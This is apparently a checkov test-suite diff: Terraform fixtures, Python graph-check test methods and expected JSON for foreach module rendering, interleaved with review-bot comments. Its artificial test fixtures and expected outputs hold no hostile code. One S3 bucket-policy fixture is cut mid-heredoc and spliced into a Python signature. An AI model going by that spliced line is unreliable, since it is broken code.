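Review bot: The fixture has no case where `auth_token` is set while `transit_encryption_enabled = false`, so the check's verdict for that combination is never pinned; ElastiCache only applies Redis AUTH over an encrypted connection, so a check named for "encryption at transit + auth token" should presumably still fail it, and a `fail4` block with `transit_encryption_enabled = false` plus `auth_token = var.auth_token` would record that expectation. The `pass` block's `auth_token = var.auth_token` and `pass2`'s `local.replication_group_id` also reference an undeclared variable and local, which is harmless for a check-only fixture but worth a `# var/local intentionally undeclared: fixture is not meant to plan` comment so the directory is not mistaken for a runnable example.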
diff --git a/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf b/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf index 925323e004c..93ecbef2331 100644 --- a/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf +++ b/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf @@ -458,4 +458,29 @@ resource "aws_s3_bucket" "pass_w_condition5" { ] } POLICY +} + +resource "aws_s3_bucket" "pass_w_condition6" { + bucket = aws_s3_bucket.example_bucket.id + + policy = < None: warnings.filterwarnings("ignore", category=ResourceWarning) warnings.filterwarnings("ignore", category=DeprecationWarning) + def test_DatabricksWorkspaceDBFSRootCustomerManagedKey(self): + self.go("DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey") + def test_KmsKeyPolicyIsDefined(self): self.go("KmsKeyPolicyIsDefined") @@ -50,7 +53,7 @@ def test_S3NotAllowAccessToAllAuthenticatedUsers(self): self.go("S3NotAllowAccessToAllAuthenticatedUsers") def test_CloudFrontHasCustomSSLCertificate(self): - self.go("CloudFrontHasCustomSSLCertificate") + self.go("CloudFrontHasCustomSSLCertificate") def test_CodecommitApprovalRulesAttached(self): self.go("CodecommitApprovalRulesAttached") @@ -65,7 +68,7 @@ def test_APIGatewayEndpointsUsesCertificateForAuthentication(self): self.go("APIGatewayEndpointsUsesCertificateForAuthentication") def test_APIGatewayRequestParameterValidationEnabled(self): - self.go("APIGatewayRequestParameterValidationEnabled") + self.go("APIGatewayRequestParameterValidationEnabled") def test_CloudFrontUsesSecureProtocolsForHTTPS(self): self.go("CloudFrontUsesSecureProtocolsForHTTPS") 
@@ -74,7 +77,7 @@ def test_EMRClusterHasSecurityConfiguration(self): self.go("EMRClusterHasSecurityConfiguration") def test_OpenSearchDomainHasFineGrainedControl(self): - self.go("OpenSearchDomainHasFineGrainedControl") + self.go("OpenSearchDomainHasFineGrainedControl") def test_VPCHasRestrictedSG(self): self.go("VPCHasRestrictedSG") @@ -89,7 +92,7 @@ def test_SGAttachedToResource(self): self.go("SGAttachedToResource") def test_EC2InstanceHasIAMRoleAttached(self): - self.go("EC2InstanceHasIAMRoleAttached") + self.go("EC2InstanceHasIAMRoleAttached") def test_StorageContainerActivityLogsNotPublic(self): self.go("StorageContainerActivityLogsNotPublic") @@ -116,7 +119,7 @@ def test_DMSEndpointHaveSSLConfigured(self): self.go("DMSEndpointHaveSSLConfigured") def test_ElastiCacheRedisConfiguredAutomaticFailOver(self): - self.go("ElastiCacheRedisConfiguredAutomaticFailOver") + self.go("ElastiCacheRedisConfiguredAutomaticFailOver") def test_VAconfiguredToSendReportsToAdmins(self): self.go("VAconfiguredToSendReportsToAdmins") @@ -156,7 +159,7 @@ def test_GCPDocumentAIWarehouseLocationEncryptedWithCMK(self): def test_GCPVertexInstanceEncryptedWithCMK(self): self.go("GCPVertexInstanceEncryptedWithCMK") - + def test_GCPVertexAIEndpointEncryptedWithCMK(self): self.go("GCPVertexAIEndpointEncryptedWithCMK") @@ -171,9 +174,9 @@ def test_GCPVertexWorkbenchInstanceEncryptedWithCMK(self): def test_GCPVertexWorkbenchInstanceNoPublicIp(self): self.go("GCPVertexWorkbenchInstanceNoPublicIp") - + def test_GCRContainerVulnerabilityScanningEnabled(self): - self.go("GCRContainerVulnerabilityScanningEnabled") + self.go("GCRContainerVulnerabilityScanningEnabled") def test_AzureDataFactoriesEncryptedWithCustomerManagedKey(self): self.go("AzureDataFactoriesEncryptedWithCustomerManagedKey") 
@@ -194,7 +197,7 @@ def test_GCPLogBucketsConfiguredUsingLock(self): self.go("GCPLogBucketsConfiguredUsingLock") def test_CloudFunctionSecureHTTPTrigger(self): - self.go("CloudFunctionSecureHTTPTrigger") + self.go("CloudFunctionSecureHTTPTrigger") def test_GCPAuditLogsConfiguredForAllServicesAndUsers(self): self.go("GCPAuditLogsConfiguredForAllServicesAndUsers") @@ -324,10 +327,10 @@ def test_GCPKMSKeyRingsAreNotPubliclyAccessible(self): def test_GCPContainerRegistryReposAreNotPubliclyAccessible(self): self.go("GCPContainerRegistryReposAreNotPubliclyAccessible") - + def test_GCPDialogFlowAgentLoggingEnabled(self): self.go("GCPDialogFlowAgentLoggingEnabled") - + def test_GCPDialogFlowCxAgentLoggingEnabled(self): self.go("GCPDialogFlowCxAgentLoggingEnabled") @@ -336,13 +339,13 @@ def test_GCPDialogFlowCxWebhookLoggingEnabled(self): def test_GCPVertexAIPrivateEndpoint(self): self.go("GCPVertexAIPrivateEndpoint") - + def test_GCPVertexAIPrivateIndexEndpoint(self): self.go("GCPVertexAIPrivateIndexEndpoint") def test_GCPTpuV2VmPrivateEndpoint(self): self.go("GCPTpuV2VmPrivateEndpoint") - + def test_GCPVertexRuntimePrivate(self): self.go("GCPVertexRuntimePrivate") @@ -411,7 +414,7 @@ def test_GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled(self): def test_GCPdisableAlphaClusterFeatureInKubernetesEngineClusters(self): self.go("GCPdisableAlphaClusterFeatureInKubernetesEngineClusters") - + def test_AzureContainerInstanceconfigManagedIdentity(self): self.go("AzureContainerInstanceconfigManagedIdentity") @@ -429,7 +432,7 @@ def test_AzureKeyVaultConfigPrivateEndpoint(self): def test_AzureStorageAccConfigWithPrivateEndpoint(self): self.go("AzureStorageAccConfigWithPrivateEndpoint") - + def test_OCI_K8EngineClusterBootVolConfigInTransitEncryption(self): self.go("OCI_K8EngineClusterBootVolConfigInTransitEncryption") 
@@ -456,6 +459,12 @@ def test_AzureAutomationAccConfigManagedIdentity(self): def test_AzureMariaDBserverUsingTLS_1_2(self): self.go("AzureMariaDBserverUsingTLS_1_2") + + def test_AzureMLWorkspaceWithPublicStorageAccount(self): + self.go("AzureMLWorkspaceHBIPublicNetwork") + + def test_AzureMLWorkspacePublicNetwork(self): + self.go("AzureMLWorkspacePublicNetwork") def test_AzureStorageAccountEnableSoftDelete(self): self.go("AzureStorageAccountEnableSoftDelete") @@ -496,6 +505,9 @@ def test_IBM_AppLBforVPCisPrivate(self): def test_IBM_VPCclassicAccessIsDisabled(self): self.go("IBM_VPCclassicAccessIsDisabled") + def test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic(self): + self.go("SageMakerIAMPolicyOverlyPermissiveToAllTraffic") + def test_IBM_RestrictServiceIDCreationInAccountSettings(self): self.go("IBM_RestrictServiceIDCreationInAccountSettings") @@ -511,6 +523,9 @@ def test_IBM_DatabasesNWaccessRestrictedToSpecificIPrange(self): def test_IBM_K8sClustersAccessibleViaPrivateEndPt(self): self.go("IBM_K8sClustersAccessibleViaPrivateEndPt") + def test_S3CMKRegularRotation(self): + self.go("S3CMKRegularRotation") + def test_registry_load(self): registry = Registry(parser=GraphCheckParser(), checks_dir=str( Path(__file__).parent.parent.parent.parent.parent / "checkov" / "terraform" / "checks" / "graph_checks")) diff --git a/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json b/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json index e8735ca7d20..6aef536a90b 100644 --- a/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json +++ b/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json 
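Review bot: `test_AzureMLWorkspaceWithPublicStorageAccount` calls `self.go("AzureMLWorkspaceHBIPublicNetwork")`, breaking the file's convention that the test method name equals the policy name handed to `go` (every neighbouring method, including the new `test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic` and `test_S3CMKRegularRotation`, follows it); the same mismatch appears to have been introduced earlier in the file for the Databricks DBFS-root policy. Renaming this method to `test_AzureMLWorkspaceHBIPublicNetwork` keeps a grep for the policy id landing on its test and avoids the impression that a separate "public storage account" policy exists. The class and the surrounding methods start outside this hunk.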
@@ -3,6 +3,7 @@ "module": [ { "s3_module[\"a\"]": { + "__address__": "s3_module[\"a\"]", "__end_line__": 12, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}" @@ -16,12 +17,12 @@ ], "source": [ "./module" - ], - "__address__": "s3_module[\"a\"]" + ] } }, { "s3_module2[0]": { + "__address__": "s3_module2[0]", "__end_line__": 19, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}" @@ -35,12 +36,12 @@ ], "source": [ "./module" - ], - "__address__": "s3_module2[0]" + ] } }, { "s3_module[\"b\"]": { + "__address__": "s3_module[\"b\"]", "__end_line__": 12, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}" @@ -54,12 +55,12 @@ ], "source": [ "./module" - ], - "__address__": "s3_module[\"b\"]" + ] } }, { "s3_module2[1]": { + "__address__": "s3_module2[1]", "__end_line__": 19, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}" 
@@ -73,14 +74,14 @@ ], "source": [ "./module" - ], - "__address__": "s3_module2[1]" + ] } } ], "provider": [ { "aws": { + "__address__": "aws.test_provider", "__end_line__": 5, "__start_line__": 1, "alias": [ @@ -91,8 +92,7 @@ ], "test_provider": [ true - ], - "__address__": "aws.test_provider" + ] } } ] 
@@ -101,88 +101,178 @@ "module": [ { "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module[\"c\"]", "__end_line__": 5, "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + false + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"e\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], 
+ "__start_line__": 7, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module[\"d\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module[\"d\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + false ], "source": [ "./module2" + ] + } + }, + { + "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"f\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], - "__address__": "module.s3_module[\"a\"].inner_s3_module[\"c\"]" + "__start_line__": 7, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] + } + } + ], + "variable": [ + { + "bucket": { + "__address__": "module.s3_module[\"a\"].bucket", + "__end_line__": 16, + "__start_line__": 14, + "type": [ + "string" + ] + } + }, + { + "bucket2": { + "__address__": "module.s3_module[\"a\"].bucket2", + "__end_line__": 20, + "__start_line__": 18, + "type": [ + 
"string" + ] + } + } + ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module[\"c\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + false + ], + "source": [ + "./module2" + ] } }, { "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"e\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + "" ], "source": [ "./module2" - ], - "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"e\"]" + ] } }, { "inner_s3_module[\"d\"]": { + 
"__address__": "module.s3_module[\"b\"].inner_s3_module[\"d\"]", "__end_line__": 5, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + false ], "source": [ "./module2" - ], - "__address__": "module.s3_module[\"a\"].inner_s3_module[\"d\"]" + ] } }, { "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"f\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + "" ], "source": [ "./module2" - ], - "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"f\"]" + ] } } ], "variable": [ { "bucket": { + "__address__": "module.s3_module[\"b\"].bucket", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].bucket" + ] } }, { "bucket2": { + "__address__": "module.s3_module[\"b\"].bucket2", "__end_line__": 20, "__start_line__": 18, "type": [ "string" - ], - "__address__": 
"module.s3_module[\"a\"].bucket2" + ] } } ] 
@@ -191,88 +281,178 @@ "module": [ { "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module2[0].inner_s3_module[\"c\"]", "__end_line__": 5, "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module2[0].inner_s3_module2[\"e\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + 
"__start_line__": 7, + "bucket2": [ + true + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module[\"d\"]": { + "__address__": "module.s3_module2[0].inner_s3_module[\"d\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + "" + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module2[0].inner_s3_module2[\"f\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 7, + "bucket2": [ + true ], "source": [ "./module2" + ] + } + } + ], + "variable": [ + { + "bucket": { + "__address__": "module.s3_module2[0].bucket", + "__end_line__": 16, + "__start_line__": 14, + "type": [ + "string" + ] + } + }, + { + "bucket2": { + "__address__": "module.s3_module2[0].bucket2", + "__end_line__": 20, + "__start_line__": 18, + "type": [ + "string" + ] + } + } + ] + }, + "{\"file_path\": 
\".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module2[1].inner_s3_module[\"c\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], - "__address__": "module.s3_module2[0].inner_s3_module[\"c\"]" + "__start_line__": 1, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] } }, { "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module2[1].inner_s3_module2[\"e\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + true ], "source": [ "./module2" - ], - "__address__": "module.s3_module2[0].inner_s3_module2[\"e\"]" + ] } }, { "inner_s3_module[\"d\"]": { + 
"__address__": "module.s3_module2[1].inner_s3_module[\"d\"]", "__end_line__": 5, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + "" ], "source": [ "./module2" - ], - "__address__": "module.s3_module2[0].inner_s3_module[\"d\"]" + ] } }, { "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module2[1].inner_s3_module2[\"f\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + true ], "source": [ "./module2" - ], - "__address__": "module.s3_module2[0].inner_s3_module2[\"f\"]" + ] } } ], "variable": [ { "bucket": { + "__address__": "module.s3_module2[1].bucket", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].bucket" + ] } }, { "bucket2": { + "__address__": "module.s3_module2[1].bucket2", "__end_line__": 20, "__start_line__": 18, "type": [ "string" - ], - "__address__": "module.s3_module2[0].bucket2" + ] } } ] 
@@ -280,17 +460,19 @@
 "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": {
 "locals": [
 {
+ "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2",
 "bucket2": [
- "var.bucket2"
- ],
- "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2"
+ false
+ ]
 }
 ],
 "resource": [
 {
 "aws_s3_bucket_public_access_block": {
 "var_bucket": {
+ "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket",
 "__end_line__": 11,
+ "__provider_address__": "",
 "__start_line__": 5,
 "block_public_acls": [
 true
@@ -299,15 +481,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ false
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -315,30 +496,32 @@
 "variable": [
 {
 "bucket2": {
+ "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2",
 "__end_line__": 16,
 "__start_line__": 14,
 "type": [
 "string"
- ],
- "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2"
+ ]
 }
 }
 ]
 },
- "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": {
+ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": {
 "locals": [
 {
+ "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2",
 "bucket2": [
- "var.bucket2"
- ],
- "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2"
+ false
+ ]
 }
 ],
 "resource": [
 {
 "aws_s3_bucket_public_access_block": {
 "var_bucket": {
+ "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket",
 "__end_line__": 11,
+ "__provider_address__": "",
 "__start_line__": 5,
 "block_public_acls": [
 true
@@ -347,15 +530,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ false
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
